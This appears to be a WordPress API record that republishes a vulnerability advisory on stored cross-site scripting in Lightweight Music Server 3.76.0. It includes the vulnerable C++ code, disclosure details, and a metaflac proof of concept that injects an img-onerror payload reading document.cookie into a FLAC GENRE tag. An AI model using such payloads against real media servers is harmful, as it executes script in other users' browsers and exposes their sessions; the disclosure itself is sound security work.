{"id":58700,"date":"2026-05-31T14:39:19","date_gmt":"2026-05-31T14:39:19","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=58700"},"modified":"2026-05-31T14:39:19","modified_gmt":"2026-05-31T14:39:19","slug":"lightweight-music-server-lms-3760-metadata-stored-xss","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=58700","title":{"rendered":"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-31T18:50:26&#8243;,&#8221;description&#8221;:&#8221;Summary LMS Lightweight Music Server: A specific C++ based project focused on a low memory footprint, featuring built-in user management and a recommendation engine. Description LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-31T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-31T00:00:00&#8243;,&#8221;type&#8221;:&#8221;zeroscience&#8221;,&#8221;title&#8221;:&#8221;Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;ZSL-2026-5987&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;\\u003chtml\\u003e\\u003cbody\\u003e\\u003cp\\u003eLightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS\\r\\n\\r\\n\\r\\nVendor: Emeric Poupon\\r\\nProduct web page: https:\/\/github.com\/epoupon\/lms\\r\\nAffected version 3.76.0\\r\\n\\r\\nSummary: LMS (Lightweight Music Server): A specific C++ based\\r\\nproject focused on a low memory footprint, featuring built-in\\r\\nuser management and a recommendation engine.\\r\\n\\r\\nDesc: LMS stores media file metadata tags (such as GENRE, ARTIST,\\r\\nand ALBUM) exactly as written in the file and later renders them\\r\\nin its web interface without HTML-encoding, resulting in stored\\r\\ncross-site scripting. An attacker who gets a file with a malicious\\r\\ntag into the victim&#8217;s library has their payload saved during the\\r\\nnext library scan and executed automatically whenever a user views\\r\\nthat track&#8217;s information or plays the file in the web UI.\\r\\n\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\\r\\n\/src\/lms\/ui\/Utils.cpp\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\r\\n131: std::unique_ptr\\u003cwt::winteractwidget\\u003e createFilter(const Wt::WString\\u0026amp; name, const Wt::WString\\u0026amp; tooltip, std::string_view colorStyleClass, bool canDelete)\\r\\n132: {\\r\\n133:   auto res{ std::make_unique\\u003cwt::wtext\\u003e(Wt::WString{ canDelete ? \\&#8221;\\u003ci class=&#8217;\\\\\\&#8221;fa&#8217; fa-times-circle=\\&#8221;\\&#8221;\\u003e\\u003c\/i\\u003e \\&#8221; : \\&#8221;\\&#8221; } + name, Wt::TextFormat::UnsafeXHTML) };\\r\\n134:   res-\\u0026gt;setStyleClass(\\&#8221;Lms-badge-cluster badge me-1 \\&#8221; + std::string{ colorStyleClass });\\r\\n135:   res-\\u0026gt;setInline(true);\\r\\n136:   return res;\\r\\n137: }\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\\r\\n\\r\\nTested on: GNU\/Linux (ARM64)\\r\\n           nginx\\r\\n\\r\\n\\r\\nVulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic\\r\\n                            @zeroscience\\r\\n\\r\\n\\r\\nAdvisory ID: ZSL-2026-5987\\r\\nAdvisory URL: https:\/\/www.zeroscience.mk\/#\/advisories\/ZSL-2026-5987\\r\\n\\r\\n\\r\\n27.05.2026\\r\\n\\r\\n&#8211;\\r\\n\\r\\n\\r\\n$ metaflac &#8211;set-tag=GENRE=\\&#8221;\\u003cimg onerror=\\&#8221;alert(document.cookie)\\&#8221; src=\\&#8221;1\\&#8221;\/\\u003e\\&#8221; evil.flac\\r\\n$ metaflac &#8211;list evil.flac\\r\\nMETADATA block #0\\r\\n  type: 0 (STREAMINFO)\\r\\n  is last: false\\r\\n  length: 34\\r\\n  minimum blocksize: 4608 samples\\r\\n  maximum blocksize: 4608 samples\\r\\n  minimum framesize: 2305 bytes\\r\\n  maximum framesize: 14124 bytes\\r\\n  sample_rate: 44100 Hz\\r\\n  channels: 2\\r\\n  bits-per-sample: 16\\r\\n  total samples: 4664587\\r\\n  MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d\\r\\nMETADATA block #1\\r\\n  type: 4 (VORBIS_COMMENT)\\r\\n  is last: false\\r\\n  length: 98\\r\\n  vendor string: Lavf57.83.100\\r\\n  comments: 2\\r\\n    comment[0]: encoder=Lavf57.83.100\\r\\n    comment[1]: GENRE=\\u003cimg onerror=\\&#8221;alert(document.cookie)\\&#8221; src=\\&#8221;1\\&#8221;\/\\u003e\\r\\nMETADATA block #2\\r\\n  type: 1 (PADDING)\\r\\n  is last: true\\r\\n  length: 8140\\r\\n\\r\\n\\u003c\/wt::wtext\\u003e\\u003c\/wt::winteractwidget\\u003e\\u003c\/p\\u003e\\u003c\/body\\u003e\\u003c\/html\\u003e&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.zeroscience.mk\/codes\/lms_xss.txt&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.zeroscience.mk\/advisories\/ZSL-2026-5987.html&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-31T18:50:26&#8243;,&#8221;description&#8221;:&#8221;Summary LMS Lightweight Music Server: A specific C++ based project focused on a low memory footprint, featuring built-in user management and a recommendation engine. Description&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,7,11,5,107],"class_list":["post-58700","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability","tag-zeroscience"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=58700\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-31T18:50:26&#8243;,&#8221;description&#8221;:&#8221;Summary LMS Lightweight Music Server: A specific C++ based project focused on a low memory footprint, featuring built-in user management and a recommendation engine. Description...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=58700\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-31T14:39:19+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58700#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58700\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987\",\"datePublished\":\"2026-05-31T14:39:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58700\"},\"wordCount\":638,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\",\"zeroscience\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=58700#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58700\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58700\",\"name\":\"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-31T14:39:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58700#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=58700\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58700#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=58700","og_locale":"en_US","og_type":"article","og_title":"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-31T18:50:26&#8243;,&#8221;description&#8221;:&#8221;Summary LMS Lightweight Music Server: A specific C++ based project focused on a low memory footprint, featuring built-in user management and a recommendation engine. Description...","og_url":"https:\/\/zero.redgem.net\/?p=58700","og_site_name":"zero redgem","article_published_time":"2026-05-31T14:39:19+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=58700#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=58700"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987","datePublished":"2026-05-31T14:39:19+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=58700"},"wordCount":638,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","Security","tapic","Vulnerability","zeroscience"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=58700#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=58700","url":"https:\/\/zero.redgem.net\/?p=58700","name":"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-31T14:39:19+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=58700#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=58700"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=58700#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/58700","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=58700"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/58700\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=58700"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=58700"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=58700"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}